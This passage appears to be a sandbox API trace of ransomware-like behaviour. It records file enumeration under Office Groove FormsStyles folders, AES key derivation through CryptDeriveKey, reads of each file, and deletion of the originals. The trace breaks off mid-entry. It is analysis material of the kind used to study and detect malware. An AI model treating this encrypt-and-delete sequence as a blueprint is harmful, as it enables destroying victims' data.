[0161.147] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Sts.css", cchWideChar=-1, lpMultiByteStr=0x326a3c0, cbMultiByte=260, lpDefaultChar=0x3269b9f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Sts.css", lpUsedDefaultChar=0x0) returned 8 [0161.148] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52568) returned 1 [0161.148] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0161.148] CryptHashData (hHash=0x284d668, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0161.148] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d6a8) returned 1 [0161.148] GetFileSize (in: hFile=0x4a8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x9fe [0161.148] ReadFile (in: hFile=0x4a8, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0161.150] CryptDestroyHash (hHash=0x284d668) returned 1 [0161.150] CryptDestroyKey (hKey=0x284d6a8) returned 1 [0161.150] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0161.152] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Sts.css" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\sts.css")) returned 1 [0161.152] FindNextFileW (in: hFindFile=0x284d5a8, lpFindFileData=0x32698b8 | out: lpFindFileData=0x32698b8) returned 1 [0161.153] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0161.153] FindNextFileW (in: hFindFile=0x284d5e8, lpFindFileData=0x3268b28 | out: lpFindFileData=0x3268b28) returned 1 [0161.153] FindNextFileW (in: hFindFile=0x284d5e8, lpFindFileData=0x3268b28 | out: lpFindFileData=0x3268b28) returned 1 [0161.153] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="background.gif", cchWideChar=-1, lpMultiByteStr=0x3269630, cbMultiByte=260, lpDefaultChar=0x3268e0f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="background.gif", lpUsedDefaultChar=0x0) returned 15 [0161.179] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52568) returned 1 [0161.179] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0161.180] CryptHashData (hHash=0x284d6a8, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0161.180] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d6a8, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0161.180] GetFileSize (in: hFile=0x4a8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xe9 [0161.180] ReadFile (in: hFile=0x4a8, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0161.181] CryptDestroyHash (hHash=0x284d6a8) returned 1 [0161.181] CryptDestroyKey (hKey=0x284d668) returned 1 [0161.181] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0161.182] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\STS2\\background.gif" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\sts2\\background.gif")) returned 1 [0161.183] FindNextFileW (in: hFindFile=0x284d5e8, lpFindFileData=0x3268b28 | out: lpFindFileData=0x3268b28) returned 1 [0161.183] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HEADER.GIF", cchWideChar=-1, lpMultiByteStr=0x3269630, cbMultiByte=260, lpDefaultChar=0x3268e0f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HEADER.GIF", lpUsedDefaultChar=0x0) returned 11 [0161.183] FindNextFileW (in: hFindFile=0x284d5e8, lpFindFileData=0x3268b28 | out: lpFindFileData=0x3268b28) returned 1 [0161.183] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TAB_OFF.GIF", cchWideChar=-1, lpMultiByteStr=0x3269630, cbMultiByte=260, lpDefaultChar=0x3268e0f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TAB_OFF.GIF", lpUsedDefaultChar=0x0) returned 12 [0161.183] FindNextFileW (in: hFindFile=0x284d5e8, lpFindFileData=0x3268b28 | out: lpFindFileData=0x3268b28) returned 1 [0161.183] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TAB_ON.GIF", cchWideChar=-1, lpMultiByteStr=0x3269630, cbMultiByte=260, lpDefaultChar=0x3268e0f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TAB_ON.GIF", lpUsedDefaultChar=0x0) returned 11 [0161.183] FindNextFileW (in: hFindFile=0x284d5e8, lpFindFileData=0x3268b28 | out: lpFindFileData=0x3268b28) returned 0 [0161.183] FindClose (in: hFindFile=0x284d5e8 | out: hFindFile=0x284d5e8) returned 1 [0161.183] FindNextFileW (in: hFindFile=0x284d5a8, lpFindFileData=0x32698b8 | out: lpFindFileData=0x32698b8) returned 1 [0161.183] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Sts2.css", cchWideChar=-1, lpMultiByteStr=0x326a3c0, cbMultiByte=260, lpDefaultChar=0x3269b9f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Sts2.css", lpUsedDefaultChar=0x0) returned 9 [0161.184] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52568) returned 1 [0161.184] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0161.184] CryptHashData (hHash=0x284d5e8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0161.184] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5e8, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d628) returned 1 [0161.184] GetFileSize (in: hFile=0x4d0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xd6a [0161.184] ReadFile (in: hFile=0x4d0, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0161.186] CryptDestroyHash (hHash=0x284d5e8) returned 1 [0161.186] CryptDestroyKey (hKey=0x284d628) returned 1 [0161.186] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0161.188] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Sts2.css" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\sts2.css")) returned 1 [0161.188] FindNextFileW (in: hFindFile=0x284d5a8, lpFindFileData=0x32698b8 | out: lpFindFileData=0x32698b8) returned 1 [0161.189] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0161.189] FindNextFileW (in: hFindFile=0x284d668, lpFindFileData=0x3268b28 | out: lpFindFileData=0x3268b28) returned 1 [0161.189] FindNextFileW (in: hFindFile=0x284d668, lpFindFileData=0x3268b28 | out: lpFindFileData=0x3268b28) returned 1 [0161.189] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="background.gif", cchWideChar=-1, lpMultiByteStr=0x3269630, cbMultiByte=260, lpDefaultChar=0x3268e0f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="background.gif", lpUsedDefaultChar=0x0) returned 15 [0161.200] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52568) returned 1 [0161.201] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0161.201] CryptHashData (hHash=0x284d628, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0161.201] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d5e8) returned 1 [0161.201] GetFileSize (in: hFile=0x4d0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x32f [0161.201] ReadFile (in: hFile=0x4d0, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0161.202] CryptDestroyHash (hHash=0x284d628) returned 1 [0161.203] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0161.203] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0161.203] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Swirl\\background.gif" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\swirl\\background.gif")) returned 1 [0161.204] FindNextFileW (in: hFindFile=0x284d668, lpFindFileData=0x3268b28 | out: lpFindFileData=0x3268b28) returned 1 [0161.204] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HEADER.GIF", cchWideChar=-1, lpMultiByteStr=0x3269630, cbMultiByte=260, lpDefaultChar=0x3268e0f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HEADER.GIF", lpUsedDefaultChar=0x0) returned 11 [0161.204] FindNextFileW (in: hFindFile=0x284d668, lpFindFileData=0x3268b28 | out: lpFindFileData=0x3268b28) returned 1 [0161.204] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TAB_OFF.GIF", cchWideChar=-1, lpMultiByteStr=0x3269630, cbMultiByte=260, lpDefaultChar=0x3268e0f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TAB_OFF.GIF", lpUsedDefaultChar=0x0) returned 12 [0161.204] FindNextFileW (in: hFindFile=0x284d668, lpFindFileData=0x3268b28 | out: lpFindFileData=0x3268b28) returned 1 [0161.204] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TAB_ON.GIF", cchWideChar=-1, lpMultiByteStr=0x3269630, cbMultiByte=260, lpDefaultChar=0x3268e0f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TAB_ON.GIF", lpUsedDefaultChar=0x0) returned 11 [0161.204] FindNextFileW (in: hFindFile=0x284d668, lpFindFileData=0x3268b28 | out: lpFindFileData=0x3268b28) returned 0 [0161.204] FindClose (in: hFindFile=0x284d668 | out: hFindFile=0x284d668) returned 1 [0161.205] FindNextFileW (in: hFindFile=0x284d5a8, lpFindFileData=0x32698b8 | out: lpFindFileData=0x32698b8) returned 1 [0161.205] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Swirl.css", cchWideChar=-1, lpMultiByteStr=0x326a3c0, cbMultiByte=260, lpDefaultChar=0x3269b9f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Swirl.css", lpUsedDefaultChar=0x0) returned 10 [0161.205] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52568) returned 1 [0161.205] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0161.205] CryptHashData (hHash=0x284d668, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0161.205] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d6a8) returned 1 [0161.205] GetFileSize (in: hFile=0x4cc, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xd04 [0161.206] ReadFile (in: hFile=0x4cc, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0161.220] CryptDestroyHash (hHash=0x284d668) returned 1 [0161.220] CryptDestroyKey (hKey=0x284d6a8) returned 1 [0161.220] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0161.222] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Swirl.css" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\swirl.css")) returned 1 [0161.223] FindNextFileW (in: hFindFile=0x284d5a8, lpFindFileData=0x32698b8 | out: lpFindFileData=0x32698b8) returned 1 [0161.223] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Teal.css", cchWideChar=-1, lpMultiByteStr=0x326a3c0, cbMultiByte=260, lpDefaultChar=0x3269b9f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Teal.css", lpUsedDefaultChar=0x0) returned 9 [0161.223] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52568) returned 1 [0161.224] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0161.224] CryptHashData (hHash=0x284d5e8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0161.224] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5e8, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d6a8) returned 1 [0161.224] GetFileSize (in: hFile=0x4a8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x73c [0161.224] ReadFile (in: hFile=0x4a8, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0161.226] CryptDestroyHash (hHash=0x284d5e8) returned 1 [0161.226] CryptDestroyKey (hKey=0x284d6a8) returned 1 [0161.226] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0161.227] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Teal.css" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\teal.css")) returned 1 [0161.228] FindNextFileW (in: hFindFile=0x284d5a8, lpFindFileData=0x32698b8 | out: lpFindFileData=0x32698b8) returned 1 [0161.228] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TexturedBlue.css", cchWideChar=-1, lpMultiByteStr=0x326a3c0, cbMultiByte=260, lpDefaultChar=0x3269b9f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TexturedBlue.css", lpUsedDefaultChar=0x0) returned 17 [0161.228] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52568) returned 1 [0161.229] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0161.229] CryptHashData (hHash=0x284d668, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0161.229] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d6a8) returned 1 [0161.229] GetFileSize (in: hFile=0x4cc, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x727 [0161.229] ReadFile (in: hFile=0x4cc, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0161.231] CryptDestroyHash (hHash=0x284d668) returned 1 [0161.231] CryptDestroyKey (hKey=0x284d6a8) returned 1 [0161.231] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0161.232] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\TexturedBlue.css" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\texturedblue.css")) returned 1 [0161.233] FindNextFileW (in: hFindFile=0x284d5a8, lpFindFileData=0x32698b8 | out: lpFindFileData=0x32698b8) returned 1 [0161.233] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VelvetRose.css", cchWideChar=-1, lpMultiByteStr=0x326a3c0, cbMultiByte=260, lpDefaultChar=0x3269b9f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VelvetRose.css", lpUsedDefaultChar=0x0) returned 15 [0161.233] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52568) returned 1 [0161.233] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0161.233] CryptHashData (hHash=0x284d5e8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0161.233] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5e8, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d6a8) returned 1 [0161.233] GetFileSize (in: hFile=0x4a8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x732 [0161.234] ReadFile (in: hFile=0x4a8, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0161.254] CryptDestroyHash (hHash=0x284d5e8) returned 1 [0161.254] CryptDestroyKey (hKey=0x284d6a8) returned 1 [0161.254] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0161.255] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\VelvetRose.css" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\velvetrose.css")) returned 1 [0161.256] FindNextFileW (in: hFindFile=0x284d5a8, lpFindFileData=0x32698b8 | out: lpFindFileData=0x32698b8) returned 1 [0161.256] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="_HELP.txt", cchWideChar=-1, lpMultiByteStr=0x326a3c0, cbMultiByte=260, lpDefaultChar=0x3269b9f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="_HELP.txt", lpUsedDefaultChar=0x0) returned 10 [0161.256] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52568) returned 1 [0161.257] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0161.257] CryptHashData (hHash=0x284d668, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0161.257] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d6a8) returned 1 [0161.257] GetFileSize (in: hFile=0x4cc, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xed [0161.257] ReadFile (in: hFile=0x4cc, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0161.258] CryptDestroyHash (hHash=0x284d668) returned 1 [0161.258] CryptDestroyKey (hKey=0x284d6a8) returned 1 [0161.258] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0161.259] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\_HELP.txt" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\_help.txt")) returned 1 [0161.260] FindNextFileW (in: hFindFile=0x284d5a8, lpFindFileData=0x32698b8 | out: lpFindFileData=0x32698b8) returned 0 [0161.260] FindClose (in: hFindFile=0x284d5a8 | out: hFindFile=0x284d5a8) returned 1 [0161.260] FindNextFileW (in: hFindFile=0x284d568, lpFindFileData=0x326a648 | out: lpFindFileData=0x326a648) returned 0 [0161.260] FindClose (in: hFindFile=0x284d568 | out: hFindFile=0x284d568) returned 1 [0161.260] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0161.260] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="GrooveIntlResource.dll", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GrooveIntlResource.dll", lpUsedDefaultChar=0x0) returned 23 [0161.260] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0161.260] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="GROOVE_COL.HXC", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GROOVE_COL.HXC", lpUsedDefaultChar=0x0) returned 15 [0161.260] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0161.260] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="GROOVE_COL.HXT", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GROOVE_COL.HXT", lpUsedDefaultChar=0x0) returned 15 [0161.260] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0161.260] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="GROOVE_F_COL.HXK", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GROOVE_F_COL.HXK", lpUsedDefaultChar=0x0) returned 17 [0161.260] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0161.260] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="GROOVE_K_COL.HXK", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GROOVE_K_COL.HXK", lpUsedDefaultChar=0x0) returned 17 [0161.260] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0161.260] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HVAC.VSL", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HVAC.VSL", lpUsedDefaultChar=0x0) returned 9 [0161.260] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0161.260] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HVACDIFF.VRD", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HVACDIFF.VRD", lpUsedDefaultChar=0x0) returned 13 [0161.260] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0161.260] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HVACDUCT.VRD", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HVACDUCT.VRD", lpUsedDefaultChar=0x0) returned 13 [0161.260] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0161.260] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="INFINTL.DLL", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="INFINTL.DLL", lpUsedDefaultChar=0x0) returned 12 [0161.260] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0161.261] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="INFOPATH.HXS", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="INFOPATH.HXS", lpUsedDefaultChar=0x0) returned 13 [0161.261] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0161.261] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="INFOPATHEDITOR.HXS", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="INFOPATHEDITOR.HXS", lpUsedDefaultChar=0x0) returned 19 [0161.261] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0161.261] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="INFOPATHEDITOR_COL.HXC", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="INFOPATHEDITOR_COL.HXC", lpUsedDefaultChar=0x0) returned 23 [0161.261] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0161.261] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="INFOPATHEDITOR_COL.HXT", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="INFOPATHEDITOR_COL.HXT", lpUsedDefaultChar=0x0) returned 23 [0161.261] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0161.261] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="INFOPATHEDITOR_F_COL.HXK", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="INFOPATHEDITOR_F_COL.HXK", lpUsedDefaultChar=0x0) returned 25 [0161.261] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: 